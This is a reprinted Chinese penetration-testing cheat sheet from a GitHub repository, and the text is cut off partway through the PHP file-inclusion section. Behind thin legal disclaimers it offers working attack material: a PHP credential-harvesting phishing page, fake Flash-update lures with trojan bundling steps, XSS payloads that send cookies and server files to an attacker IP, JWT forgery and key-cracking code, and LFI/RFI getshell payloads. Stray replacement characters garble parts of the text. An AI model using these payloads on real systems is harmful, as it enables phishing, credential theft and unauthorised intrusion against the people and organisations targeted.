Reprint From https://github.com/xiaoy-sec/Pentest_Note
ABOUT Author
Pentest_Note
轉載請隨意,記得加from
聲明1:
依照《中華人民共和國網絡安全法》等相關法規規定,任何個人和組織不得從事非法侵入他人網絡�����、干擾他人網絡正常功能����、竊取網絡數據等危害網絡安全的活動;不得提供專門用于從事侵入網絡��、干擾網絡正常功能及防護措施�����、竊取網絡數據等危害網絡安全活動的程序�、工具;明知他人從事危害網絡安全的活動的,不得為其提供技術支持���、廣告推廣���、支付結算等幫助��。
聲明2:
以下內容均在本地完成復現,不涉及任何非法行為,不允許使用本項目所提及的所有技術內容進行非法行為,使用技術的風險由使用者自行承擔����。
- 信息收集
- Whois
- 網站IP
- 域名歷史IP
- 網站架構/服務器指紋/CMS識別/容器
- 子域名
- 網站使用的CMS的官方demo站
- SSL證書信息
- DNS歷史解析記錄
- 同服站點情況
- 同樣架構或源碼的站
- 網站js
- 網站使用的第三方js
- 云信息
- APP反編譯
- C段/B段信息
- 工具
- 端口對外開放情況
- 目錄掃描/爬蟲(慎用)
- WAF情況識別
- 隨手測試
- 搜索引擎
- Shodan/fofa/zoomeye
- Google dorks
- 信息泄露
- 網頁緩存
- 圖片反查
- 社交
- 手機號加入通訊錄匹配各個APP用戶信息
- 注冊過的網站
- 目標人員的興趣
- 郵箱搜集
- Exchange
- 驗證郵箱是否存在
- 歷史泄露過的資料等
- Github/Gitee等代碼托管平臺
- 被入侵網址列表
- GPS查詢
- 網站URL提取
- 蜜罐判斷(參考一下即可)
- 默認密碼
- 如需注冊
- 企業信息
- 入口點
- win10 安裝kali(wsl)
- 水坑攻擊
- 對外服務攻擊
- Web
- 前端/邏輯漏洞
- JWT攻擊手法
- XSS
- CSRF
- php任意文件讀取/下載
- php文件包含
- 常用協議
- Getshell
- allow_url_include 開啟時Getshell
- allow_url_include 關閉時Getshell
- 包含日志文件getshell
- 上傳個圖片格式的木馬直接包含
- 限制后綴時
- phpinfo-LFI 本地文件包含臨時文件getshell
- session + lfi getshell
- LFI SSH Log
- RFI&命令注入上線MSF
- XML
- XML注入
- XXE
- 判斷
- 挖掘
- 有回顯讀取本地文件
- Blind OOB XXE無回顯讀取
- 列目錄
- 不同平臺支持的協議
- 執行命令
- 內網主機探測
- 內網端口掃描
- 內部DTD利用
- Linux
- Windows
- XXE寫shell
- SSRF
- 定義
- 成因
- 挖掘
- XML
- 數據庫
- MongoDB
- PostgresSQL
- MSSQL
- 圖片處理函數
- 攻擊
- 端口探測
- SSRF+Redis
- 302反彈shell
- MySQL
- Weblogic SSRF+Redis
- Ueditor SSRF
- Discuz
- 探測存活主機
- 內外網資產對應
- 繞過方法
- gopher協議的腳本轉換
- 協議
- dict協議寫shell
- slaveof復制shell到目標
- slaveof反彈shell
- Fuzz/掃描web
- Bypass WAF
- SQL注入分塊傳輸
- 自動提供可用的tamper
- 垃圾數據
- 上傳bypass
- 圖片文件頭
- 添加圖片頭或合并圖片包含
- 后綴大小寫
- 文件名前綴加[0x09]
- 上傳.htaccess
- 二次渲染
- 上傳php3,php4,phtml等
- 文件名后加::$DATA
- asp . (空格+.)
- php. .(點+空格+點))
- 雙寫phphpp
- 00截斷
- 修改一些固定的參數
- 文件名去掉雙引號
- 加一個filename1的參數
- form變量改成f+orm
- 去掉form-data
- 在Content-Disposition或form-data;后添加多個空格
- 引號回車
- Content-Type和ConTent-Disposition調換位置
- 文件名前綴加空格
- name前加空格
- form-data的前后加上+
- ASP+IIS
- Asp+iis&aspx+iis
- apache
- 大小寫/關鍵字
- 雙重url編碼
- 變換請求方式
- HPP參數污染
- 數據庫
- WAF
- 未授權訪問
- Redis未授權訪問
- 測試
- JS打內網
- 反彈shell
- 寫shell
- SSH
- redis-rogue-getshell
- redis-rogue-server
- redis在windows下的利用
- Lua RCE
- Jenkins未授權訪問
- MongoDB未授權訪問
- ZooKeeper未授權訪問
- Elasticsearch未授權訪問
- Memcache未授權訪問
- Hadoop未授權訪問
- Docker未授權訪問
- ActiveMQ未授權訪問
- JBOSS未授權訪問
- 阿里云OSS Key利用
- Linux繞過disable_function
- LD_PRELOAD
- php7.0-7.3 bypass
- windows系統組件com繞過
- CGI啟動方式
- ImageMagick組件繞過
- 常規函數繞過
- pcntl_exec
- imap_open函數
- php7.4 FFI繞過
- shellshock
- 蟻劍插件
- open_basedir繞過
- Tomcat Ajp LFI&RCE
- Mysql連接文件讀取
- Mysql開啟外連
- MSSQL&Agent Job上線
- 注入無列名
- DNSLog
- 注入
- MYSQL
- MSSQL
- postgreSQL
- Oracle
- 命令執行
- XXE
- Struts
- weblogic
- Resin
- Discuz
- PHPMyadmin
- PHP-FPM RCE
- phpstudy后門
- cmdhijack
- Database
- 近源攻擊
- WI-FI破解
- 釣魚網絡
- 無線干擾
- Beacon flood
- Deauth flood
- Mdk3 destruction
- WiFi芯片esp8266
- Mdk4
- CVE-2018-4407
- 繞過mac地址認證
- BadUSB
- 克隆卡
- 藍牙
- 魚叉式攻擊
- 釣魚郵件
- CVE
- CVE-2017-11882
- CVE-2017-0199
- CVE-2012-0158
- CVE-2017-0143
- 可執行文件
- 文檔文件的偽造
- 擴展名/圖標
- 捆綁
- 宏
- 0day
- CHM
- 釣魚鏈接
- URL跳轉
- 結合惡意文檔或程序
- 短URL
- 結合水坑攻擊
- 相似域名
- 域名竊取
- 第三方服務魚叉
- 免殺
- MSF免殺
- nps_payload
- 編碼器
- c/c++源碼免殺
- 指針執行
- 申請動態內存
- 嵌入匯編
- 強制類型轉換
- 匯編花指令
- XOR加密
- 遠程線程注入
- 加載器免殺
- c#源碼免殺
- 直接編譯
- 加密處理
- XOR/AES編碼
- CSC+InstallUtil
- Python源碼免殺
- pyinstaller加載C代碼編譯
- pyinstaller加載py代碼編譯(*)
- Py2exe打包exe
- Base64編碼+Pyinstaller打包
- 加載器分離
- DLL劫持
- MSBuild
- GreatSCT
- Mshta
- InstallUtil
- Veil
- RC4
- 捆綁
- Evasion模塊
- Phantom-Evasion
- Shellter
- the-backdoor-factory
- zirikatu
- hanzoInjection
- PowerShell免殺
- 直接生成
- 分塊免殺
- Invoke-Shellcode加載
- Invoke-Obfuscation
- Xencrypt
- PyFuscation
- 拆分+C編譯
- 行為檢測
- Out-EncryptedScript
- cobalt strike powershell免殺
- Ruby
- Golang
- 內網&域
- Powershell
- 遠程執行
- 加載exe
- EXE2PS1
- 繞過策略
- Base64
- 寫入bat繞過
- 拼接拆分字符串
- replace替換函數
- HTTP字符拼接繞過
- 圖片免殺
- 加載shellcode
- 加載dll
- Windows安全標識符(SID)
- 提權
- Impacket工具包
- Windows-exploit-suggester
- Wesng
- Searchsploit
- 激活guest
- MYSQL udf
- MYSQL Linux Root
- MSSQL
- xp_cmdshell
- xp_regwrite
- xp_dirtree
- sp_oacreate
- 沙盒執行
- WarSQLKit(后門)
- MSF
- Bypass UAC
- MSF
- DccwBypassUAC
- K8uac
- CMSTP
- Uacme
- Bypass-UAC
- DLL hijack
- SilentCleanup
- Sdclt
- Makecab&Wusa
- CLR BypassUAC
- eventvwr劫持注冊表
- Web Delivery
- Invoke-PsUACme
- Whitelist(白名單)
- GreatSCT
- JSRat
- Odbcconf.exe
- Msiexec.exe
- InstallUtil.exe
- Compiler.exe
- Csc
- Regasm
- Msbuild
- Winrm
- Mshta
- Regsvr32
- Rundll32
- 執行文件
- 無彈窗執行
- 增刪注冊表
- 寫文件
- Out-RundllCommand
- DotNetToJScript
- WMIC
- Msxsl
- CPL
- Runas
- 令牌竊取
- 密碼竊取
- 偽造鎖屏
- 偽造認證框
- CredsLeaker
- LoginPrompt
- Nishang-Invoke-CredentialsPhish
- RottenPotato
- PowerUp
- Powerup-AlwaysInstallElevated
- AlwaysInstallElevated提權
- Trusted Service Paths
- Vulnerable Services
- Sudo提權
- Linux計劃任務
- Linux SUID提權
- Linux /etc/passwd提權
- Linux臟牛提權
- RDP&Fireawall
- 爆破
- 注冊表開啟
- NETSH啟動服務
- 注入點開啟
- MSF開啟
- Wmic開啟
- 防火墻
- 多用戶登錄
- RDP連接記錄
- 刪除痕跡
- 端口映射&轉發
- MSF
- lcx.exe
- SSH
- Invoke-SocksProxy
- SSF
- Netsh
- Iptables
- chisel
- 命令&控制
- Interactive shell
- script reverse shell
- bash
- nc
- telnet
- php
- python
- perl
- ruby
- OpenSSL encrypt shell
- Dnscat2
- DNS TXT Command
- Powershell
- MSF+Powershell
- Powercat
- Nishang
- Bind shell
- 反向shell
- UDP反向shell
- HTTPS
- ICMP
- Base64
- Metasploit
- 常規使用
- 技巧使用
- 模塊
- Auxiliary
- Payload
- Windows
- Linux
- MacOS
- Web
- Android
- shellcode
- msf設置監聽
- Meterpreter
- MSF派生Cobalt strike和Empire
- Empire
- 安裝
- 監聽
- 生成
- 連接靶機及其他操作
- 提權
- 橫向
- 后門&持久化
- Collection(信息采集)
- Code_execution(代碼執行)
- Credentials(身份憑證)
- Exfiltration(數據竊取)
- Exploitation(漏洞利用EXP)
- Lateral_movement(橫向移動)
- Management(管理)
- Persistence(持久化)
- Privesc(權限提升)
- Recon(偵察)
- Situational_awareness(態勢感知)
- Trollsploit(惡作劇)
- Empire Word
- Empire派生Cobalt Strike和MSF
- Cobalt Strike
- 安裝
- 部署TeamServer
- 模塊
- 連接
- 監聽器
- 攻擊模塊
- 視圖模塊
- 交互
- Beacon
- 克隆網站
- office宏
- 釣魚郵件
- 加載腳本
- 瀏覽器劫持
- 權限維持
- 橫向
- 隔離網絡
- 代理
- 部署VPN
- Cobalt strike派生 Empire和MSF
- JSRat
- CrackMapExec
- koadic
- SILENTTRINITY
- Browser C2
- DropBox C2
- Gmail C2
- Telegram C2
- 信息收集
- HTTP服務
- 文件操作
- Windows查找文件
- Linux查找文件
- 創建
- 壓縮
- 解壓
- 傳輸
- FTP
- VBS
- JS
- Bitsadmin
- Powershell
- Certutil
- Python
- Perl
- PHP
- Curl
- wget
- nc
- SCP
- Hash&密碼
- 破解網址
- GoogleColab破解hash
- 密碼策略
- 開啟Wdigest
- Getpass
- QuarksPwDump
- MSF
- Empire
- Invoke-Dcsync
- Mimikatz
- 調用mimikatz遠程抓取
- 橫向批量抓hash
- 直接使用
- Powershell Bypass
- .net 2.0
- .net 4.0 Msbuild
- JScript
- Procdump64+mimikatz
- Dumpert
- Cisco Jabber轉儲lsass
- 繞過卡巴斯基
- 遠程LSASS進程轉儲-Physmem2profit
- SqlDumper+mimikatz
- Mimipenguin
- 緩存hash提取
- 注冊表
- Ninjacopy
- Quarks-pwdump
- 域hash提取
- Ntdsutil
- Vssadmin
- Impacket
- NTDSDumpex
- WMI調用Vssadmin
- PowerSploit
- Nishang
- Mimikatz
- MSF
- laZagne
- 敏感信息
- Seatbelt
- VNC密碼
- Navicat信息
- Chrome保存的密碼
- Foxmail
- firefox保存的密碼
- SecureCRT
- 橫向
- 探測存活主機
- For+Ping命令查詢存活主機
- NbtScan
- NMAP
- NetDiscover
- rp-scan
- MSF
- 探測服務&端口
- Powershell
- SMB
- Linux Samba服務
- MSF
- Nc
- Masscan
- PTScan
- CobaltStrike+K8 Aggressor
- 存活主機
- MS17010
- 操作系統信息
- 內網站點banner�、標題掃描
- FTP爆破
- WMI爆破windows賬戶密碼
- 思科設備掃描
- 枚舉共享
- 枚舉SQL SERVER數據庫
- 執行命令&IPC&計劃任務
- 快速定位域管理登過的機器
- MSF添加路由
- MSF管道監聽
- 代理
- SSH
- 正向代理
- 反向代理
- SSH隧道+rc4雙重加密
- 公網SSH隧道+Local MSF
- socks4a
- socks5
- 基于web的socks5
- reGeorg
- Neo-reGeorg
- ABPTTS端口轉發
- Tunna轉發
- Earthworm
- 正向(目標機存在外網ip):
- 反彈socks5(目標機無外網IP):
- 二級環境(A有外網,B內網無外網):
- 二級環境(A無外網,B內網無外網):
- 三級環境(A無外網,B內網無外網通A,C通B):
- Frp
- SSF
- 正向socks代理
- 反向socks代理
- 多級級聯
- 反彈shell
- Sass
- Goproxy
- Chisel
- 代理軟件
- Ngrok內網穿透
- MS17-010
- MS08_067
- 攻擊MySQL數據庫
- 攻擊MSSQL數據庫
- 隔離主機payload
- 爆破
- Hydra
- Medusa
- 域內爆破
- Kerbrute
- DomainPasswordSpray
- 方程式內網不產生session
- Kerberoasting
- SPN發現
- 申請票據
- 導出票據
- 破解密碼
- 重寫票據
- GetUserSPNs
- ASEPRoasting
- PASS-THE-HASH
- WMIExec & TheHash
- WMI
- wmiexec.py
- wmiexec.vbs
- Powershell
- Psexec
- Mimikatz
- pth-winexe
- Smbexec
- PASS-THE-TICKET
- 名詞
- 黃金票據+Mimikatz
- 白銀票據+Mimikatz
- MS14-068
- Mimikatz+MSF
- goldenPac.py
- 賬戶委派
- 資源受限委派
- CVE-2019-0708
- NTLM中繼
- Ntlmrelayx+資源受限委派
- Responder
- SMB協議截獲
- WPAD代理欺騙
- Web漏洞
- 中繼攻擊
- NTLMv2Hash破解
- GPP-Password
- WinRM無文件執行
- 添加域管命令
- SSH密鑰免密登錄
- 獲取保存的RDP密碼
- 后門&持久化
- 影子用戶
- RID劫持
- Guest激活
- 映像劫持
- 注冊表啟動項
- 計劃任務
- 進程注入
- AppCertDlls
- AppInit_DLLs
- MSF
- 登錄初始化
- MOF
- WinRM端口復用
- 創建服務
- Bitadmin
- CLR Injection
- COM OBJECT hijacking
- CAccPropServicesClass and MMDeviceEnumerato
- Explorer
- Squibledoo
- DLL劫持
- DLL代理劫持右鍵
- 使用AMSI掃描接口維持權限
- DLL劫持計劃任務
- DLL注入
- 通過控制面板加載項維持權限
- 通過自定義.net垃圾回收機制進行DLL注入
- Windows FAX DLL Injection
- DSRM+注冊表ACL后門
- DCShadow&SID History
- DCSync后門
- Netsh Helper DLL
- MSFvenom生成DLL
- MSF+web_delivery
- MSF&Shellcode
- MSSQL后門
- NSSM
- 添加簽名
- Metsvc
- Persistence
- HookPasswordChangeNotify
- NPPSpy記錄密碼
- Password Filter DLL
- WMIC事件訂閱
- WMI-Persistence
- Invoke-Tasksbackdoor
- Invoke-ADSBackdoor
- ADS隱藏webshell
- ADS&JavaScript
- Empire
- 注入SSP被動收集密碼
- Mimikatz
- Empire
- Powersploit
- 基于域策略文件權限后門
- Kerberoasting后門
- S4U2Self后門
- 受限委派后門
- Skeleton Key萬能鑰匙
- 唯一IP訪問
- Linux cron后門
- Strace記錄ssh密碼
- SSHD后門
- 進程注入
- SSH wrapper后門
- SUID Shell
- SSH公私鑰登錄
- Reptile
- Kbeast_rootkit
- OpenSSH后門
- IPTables端口復用
- 文件處理
- IIS_Bin_Backdoor
- IIS_NETDLL_Spy
- IIS_RAID
- JAVA Web Backdoor
- Tomcat JSP HideShell
- Apache Module后門1
- Apache Module后門2
- Apache Module后門3
- Nginx Lua后門
- PwnNginx
- 滲透和紅隊tips
- 父進程破壞
- loT高頻率賬戶密碼
- Bypass mod_security
- 查找git和svn的字典
- Top 25 重定向dorks
- 使用grep快速去除垃圾數據
- 已泄露的密碼整理出的字典
- 命令注入Bypass
- 查詢是否存在heartbleed漏洞
- 遠程解壓文件
- Top25 ssrf dorks
- 使用SecurityTrails API查詢子域名
- 郵件地址payload
- Web server日志分析命令
- Bypass AMSI
- Bypass AMSI 2
- CVE-2020-5902
- 一些可嘗試繞過白名單的執行
- 繞過lsa protection
- Pezor免殺
- 動態調用進程注入邏輯
- 在Windows Server 2016和2019中繞過Windows Defender
- 內存中解碼shellcode繞過av
- cshot shellcode遠程加載器
- thinkphp滲透手段
- 使用windows defender下載文件
- Powershell腳本混淆繞過amsi和av
- 通過掛起EventLog服務線程禁用Windows事件日志
- dedecms
- dedecms前臺重置任意管理員密碼
- Shiro rememberMe反序列化漏洞
- Shiro Padding Oracle Attack
- shiro權限繞過
- 編輯器漏洞
- 寶塔面板未授權訪問phpmyadmin
- 深信服
- 從LFI到RCE
- 隱藏windows服務
信息收集
Whois
站點注冊人注冊過的其他網站(對注冊人�、郵箱�、電話的反查),對查到的站點的深入
網站IP
是否存在CDN
Ping��、多地ping����、國外ping
Bypass cdn常規方式
子域名https://dnsdb.io/zh-cn/Ping根域名NslookupCloudflare的真實IP尋找 http://crimeflare.org:82/cfs.html https://github.com/gwen001/pentest-tools/blob/master/cloudflare-origin-ip.py查找老域名查找關聯域名 www.baidu.com www.baidu.cn www.baidu.org www.baidu.xyz等等信息泄露/配置文件Phpinfo網頁源碼SvnGithubShodan/fofa/zoomeyeSSL證書記錄https://censys.io/網站漏洞 Xss Ssrf 命令執行 SQL注入(某種情況loadfile讀取linux的ip配置文件,hosts文件等)DNS記錄,證書記錄設置xff/x-remote-ip/x-remote-addr為127.0.0.1/或ipv6地址RSS訂閱/郵件頭APP反編譯搜索/截取APP的請求信息修改hosts文件指向
域名歷史IP
https://x.threatbook.cn/
網站架構/服務器指紋/CMS識別/容器
Whatweb網頁源代碼請求頭/響應頭網站底部,頂部,左上角右上角網站報錯信息http://www.yunsee.cn/域名/installFirefox插件WappalyzerCMS漏洞 定位版本對應已知漏洞檢查 CMS未知漏洞挖掘Web容器已知漏洞(解析漏洞這種)顯示網站使用的技術 https://builtwith.com/中間件����、組件Weblogic��、tomcat����、zabbix�����、struts����、axis等https://github.com/FortyNorthSecurity/EyeWitness
子域名
老站�����、同樣架構或同源碼的子站爆破,接口查詢 https://phpinfo.me/domain/ https://d.chinacycc.com/index.php?m=Login&a=index subDomainBrute�����、knockpyOWA發現���、dig adfs����、dig mailhttps://dns.bufferover.run/dns?q=baidu.comhttp://api.hackertarget.com/reversedns/?q=target.com
網站使用的CMS的官方demo站
找不到demo就找源碼開發者,加群什么的,結合社會工程學要個后臺截圖(對于一些后臺目錄復雜的cms),注意看網站上一些功能介紹的截圖�����。
SSL證書信息
https://crt.sh/?q=%25.target.comhttps://censys.io/certificates?q=target.comhttps://github.com/cheetz/sslScrape
DNS歷史解析記錄
https://dnsdumpster.com/https://censys.io/https://securitytrails.com/域傳送漏洞檢查 Dnsenum����、fiercehttp://ha.ckers.org/fierce/$ ./fierce.pl -dns example.com$ ./fierce.pl –dns example.com –wordlist myWordList.txt>dig @ns.example.com example=.com AXFR>nslookup -type=ns xxx.yyy.cn #查詢解析某域名的DNS服務器>nslookup #進入nslookup交互模式>server dns.domian.com #指定dns服務器>ls xxx.yyy.cn #列出域信息
同服站點情況
https://site.ip138.com/火狐插件flagfox,配置單擊指向bing查ip對應的域名
同樣架構或源碼的站
網站js
https://github.com/003random/getJShttps://github.com/Threezh1/JSFinder或瀏覽器F12也可以看到加載的敏感信息����、可能存在漏洞的參數等信息查看網頁源代碼,注釋的一些信息,比如沒有刪掉的接口����、前臺沒有的頁面�����、越權���、注入�、js等
網站使用的第三方js
云信息
Aliyun���、AWS���、GCP����、Azure等查找可公開訪問的實例 https://github.com/gwen001/s3-buckets-finder https://github.com/nccgroup/aws-inventory https://github.com/jordanpotti/AWSBucketDump
APP反編譯
url�、js�、osskey�����、api等信息查找搜集到接口該怎么做 Fuzz常見參數
C段/B段信息
Banner�����、是否存在目標的后臺或其他入口/其他業務系統
工具
recon-ng,theharvester,maltego,exiftool等https://www.spiderfoot.net/https://github.com/smicallef/spiderfoot
端口對外開放情況
Masscan�、scanport等針對常見的那些端口的利用的常規方法常見的未授權訪問的服務如redis,mongodb等
目錄掃描/爬蟲(慎用)
WAF情況識別
https://github.com/EnableSecurity/wafw00f做好繞過策略的計劃
隨手測試
單引號xx.jpg/.phpadmin/123456萬能密碼Heartbleed漏洞
搜索引擎
Google自定義搜索引擎整合的300多個社交網站 https://cse.google.com/cse?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:iyxger-cwug&q=%22%22Google自定義搜索引擎整合的文件共享網站 https://cse.google.com/cse/publicurl?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:hn5bcrszfhe&q=%22%22領英用戶提取 https://cse.google.com/cse?cx=001394533911082033616:tm5y1wqwmme
Shodan/fofa/zoomeye
Google dorks
Site,filetype,intitle,inurl,intext等
信息泄露
電話���、郵箱,姓名目錄遍歷備份文件 (www.zip,xx.com.zip,www.xx.com.zip,wwwroot.zip).svn/.git/sql/robots/crossdomin.xml/DS_Store等 https://github.com/lijiejie/ds_store_exp https://github.com/admintony/svnExploit若是論壇ID=1的用戶名一般為管理�、或查看帖子信息����、生成字典網頁上客服的QQ(先判斷是企業的還是個人,用處有時不太大,看怎么用,搞個魚叉什么的)
網頁緩存
http://www.cachedpages.com/
圖片反查
百度識圖�����、googleimage����、tineye原圖查詢坐標
社交
QQ�����、weibo�、支付寶�、脈脈��、領英�、咸魚���、短視頻�����、人人����、貼吧���、論壇外網信息有些人喜歡把自己的生活傳到外網 推特��、ins���、fb等
手機號加入通訊錄匹配各個APP用戶信息
注冊過的網站
https://www.reg007.com/https://www.usersearch.org/
目標人員的興趣
目標人員的興趣 注冊過的小眾論壇,站點針對此類站點的深入收集到的用戶名,電話等信息生成字典
郵箱搜集
https://hunter.io/https://github.com/killswitch-GUI/SimplyEmail
Exchange
https://github.com/dafthack/MailSniper
驗證郵箱是否存在
https://tools.verifyemailaddress.io/
歷史泄露過的資料等
庫https://haveibeenpwned.com/https://github.com/kernelmachine/haveibeenpwned
Github/Gitee等代碼托管平臺
https://github.com/dxa4481/truffleHoghttps://github.com/lijiejie/GitHackhttps://github.com/MiSecurity/x-patrolhttps://github.com/az0ne/Github_Nuggestshttps://github.com/mazen160/GithubCloner克隆用戶的github
被入侵網址列表
http://zone-h.org/archivewooyun鏡像查找目標企業曾出現的漏洞
GPS查詢
https://www.opengps.cn/Default.aspx
網站URL提取
http://www.bulkdachecker.com/url-extractor/
蜜罐判斷(參考一下即可)
https://honeyscore.shodan.io/
默認密碼
https://default-password.info/http://routerpasswords.com
如需注冊
Sms https://www.materialtools.com/ http://receivefreesms.com/Email https://10minutemail.net/ https://zh.mytrashmailer.com/ http://24mail.chacuo.net/enus https://www.linshiyouxiang.net/Fake id https://www.fakenamegenerator.com/ http://www.haoweichi.com/ https://www.fakeaddressgenerator.com/
企業信息
天眼查����、企查查���、企業信用信息公示系統企業郵箱收集,企業架構畫像���、人員統計���、人員職責���、部門���、WiFi�����、常用部門密碼���、人員是否泄露過密碼�����、人員平時愛逛的站點����、OA/erp/crm/sso/mail/vpn等入口��、網絡安全設備(waf,ips,ids,router等統計)����、內部使用的代碼托管平臺(gitlab���、daocloud等),bug管理平臺����、服務器域名資產統計
入口點
win10 安裝kali(wsl)
Microsoft Store查找kali下載��。Powershell執行>Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux源設置vim /etc/apt/source.listdeb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free>sudo su>passwd root修改root密碼>apt-get update &apt-get upgrade 更新>apt-get dist-upgrade>apt-get cleancmd>kali config --default-user root 設置默認啟動用戶為rootcmd>net stop/start LxssManager重啟服務>apt-get install metasploit-framework>apt install kali-linux-full 安裝完整kali工具集
水坑攻擊
XSS克隆釣魚
保存js&css到服務器,登錄action改為接受密碼的文件action="./pass.php"<?php //php $user=$_POST['username']; $pass=$_POST['password']; $file=fopen('pass.txt','a+'); fwrite($file,$user."|"."pass" . "\n"); fclose($file); echo "<script>window.location.href=\"http://192.168.0.1\"</script>\n";?>構造payload<script>window.location.</script>php –S 0.0.0.0:8080 –t ./
偽造頁面釣魚
1
https://github.com/r00tSe7en/Fake-flash.cn添加xss平臺模塊window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src",'data:text/plain');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);}alert("您的FLASH版本過低,嘗試升級后訪問該頁面!");window.location.;制作自解壓捆綁一個馬.exe,一個正常exe,全選,winrar添加到壓縮文件,選擇創建自解壓格式壓縮文件,高級->自解壓選項,設置解壓路徑,c:\windows\temp\,設置->解壓后運行兩個exe文件,模式全部隱藏,更新,解壓并更新文件,覆蓋所有文件�。ResourceHacker修改文件圖標
2
if(empty($_COOKIE['flash'])){ echo '<script>alert("你當前計算機的Flash軟件已經很久未更新,將導致無法正常顯示界面內容,請下載安裝最新版本!");window.location="http://www.flash.cn.xx.com/"</script>'; setcookie("flash","true",time()+30*2400); }
對外服務攻擊
Web
前端/邏輯漏洞
注冊
任意用戶注冊可爆破用戶名注入XSS
登錄
爆破用戶名,密碼注入萬能密碼XssXss+Csrf修改返回包信息,登入他人賬戶修改cookie中的參數,如user,adminid等
任意密碼重置
1.重置一個賬戶,不發送驗證碼,設置驗證碼為空發送請求�。2.發送驗證碼,查看相應包3.驗證碼生存期的爆破4.修改相應包為成功的相應包5.手工直接跳轉到校驗成功的界面6.兩個賬戶,重置別人密碼時,替換驗證碼為自己正確的驗證碼7.重置別人密碼時,替換為自己的手機號8.重置自己的成功時,同意瀏覽器重置別人的,不發驗證碼9.替換用戶名,ID,cookie,token參數等驗證身份的參數10.通過越權修改他人的找回信息如手機/郵箱來重置
信息泄露
HTML源碼�����、JS等查看信息搜集一章
后臺
登錄參數修改為注冊參數/reg����、/register����、/sign等
JWT攻擊手法
https://jwt.io/#debugger-io
未校驗簽名
將原JWT串解碼后修改用戶名等身份認證的地方,生成新token發送請求
禁用哈希
Alg代表加密方式,修改用戶名等身份認證的地方,把HS256設置為none生成token發送請求,使用python的pyjwt模塊
jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'},algorithm='none',key='')
暴破弱密鑰
>pip3 install pyjwt>python3 crack.pyimport jwtimport termcolorjwt_str = R'token'with open('/root/password.txt') as f: for line in f: key_ = line.strip() try: jwt.decode(jwt_str,verify=True,key=key_) print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--') break except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError): print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--') except jwt.exceptions.InvalidSignatureError: print('\r',' ' * 64, '\r\btry',key_,end='',flush=True) continueelse: print('\r','\bnot found.')
XSS
打COOKIE<svg/onload="javascript:document.location.href=('http://xx.xx.xx.xx:7777?cookie='+document.cookie)">讀取HTML<svg/onload="document.location='http://xx.xx.xx.xx:7777/?'+btoa(document.body.innerHTML)">讀文件<svg/onload="xmlhttp=new XMLHttpRequest();xmlhttp.onreadystatechange=function(){ if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.location='http://xx.xx.xx.xx:7777/?'+btoa(xmlhttp.responseText); }}xmlhttp.open("GET","file.php",true);xmlhttp.send();">XSS+SSRF讀取服務器文件<svg/onload="xmlhttp=new XMLHttpRequest();xmlhttp.onreadystatechange=function(){if (xmlhttp.readyState==4 && xmlhttp.status==200){ document.location='http://vps_ip:23333/?'+btoa(xmlhttp.responseText);}}xmlhttp.open("POST","request.php",true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("url=file:///etc/passwd");">
CSRF
查看有無token等驗證身份的參數,刪掉后是否返回正常查看header中referer,origin參數,刪掉后是否返回正常使用csrftester/burpsuite生成表單,以另一賬號和瀏覽器打開測試去掉referer中域名后面的文件夾或文件替換二級域名
php任意文件讀取/下載
readfile()����、file_get_contents()�、fopen()等讀文件的函數不嚴謹,讀取文件路徑可控,輸出內容���。下載配置文件Redis�����、Weblogic�、ftp���、mysql���、web配置文件�����、history文件���、數據庫配置文件下載log文件下載web文件/1.php?f=../../etc/passwd/1.php?f=file:///etc/passwd(file://繞過../的防護)/1.php?f=file:///etc/passwd
php文件包含
函數:includerequireinclude_oncerequire_once
常用協議
file:// — 訪問本地文件系統file協議的工作目錄是當前目錄,使用file:///wwwroot/1.php等同于./wwwroot/1.php可用于繞過一些情況php:// — 訪問各個輸入/輸出流(I/O streams)
讀取/1.php?file=php://filter/read=convert.base64-encode/resource=./1.php寫入/1.php?file=php://filter/write=convert.base64-decode/resource=[file]","base64
Getshell
https://github.com/D35m0nd142/LFISuite
allow_url_include 開啟時Getshell
遠程文件包含/1.php?file=http://remote.com/shell.txt/1.php?file=php://input POST:<?php phpinfo();?>或使用curl>curl -v "http://127.0.0.1:8888/ctf/cli/3.php?file=php://input" -d "<?php phpinfo();?>"或使用data://協議解析base64的代碼/1.php?file=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg==
allow_url_include 關閉時Getshell
攻擊機開啟共享/1.php?file=//attacker/1.php創建webdav服務,shell文件放入目錄包含即可>docker run -v /root/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdavShell文件放入/root/webdav/data/1.php?file=//attacker/1.php
包含日志文件getshell
Fuzz文件https://github.com/fuzzdb-project/fuzzdbhttps://github.com/danielmiessler/SecListshttps://blog.csdn.net/qq_33020901/article/details/78810035/1.php?file=<?php phpinfo();?>/1.php?file=../../../../../../../var/log/apache2/access.logWin下使用phpstudy請求/<?php phpinfo();?>包含錯誤日志/1.php?file=C:\phpStudy\Apache\logs\error.log
上傳個圖片格式的木馬直接包含
/1.php?file=/uploadfile/1.jpg
限制后綴時
<?php$file = $_GET['file'].".php";include($file);?><br>利用偽協議zip,構造一個zip壓縮包,打包一個shell.php,將壓縮包更名為png
請求/1.php?file=zip://shell.png%23shell
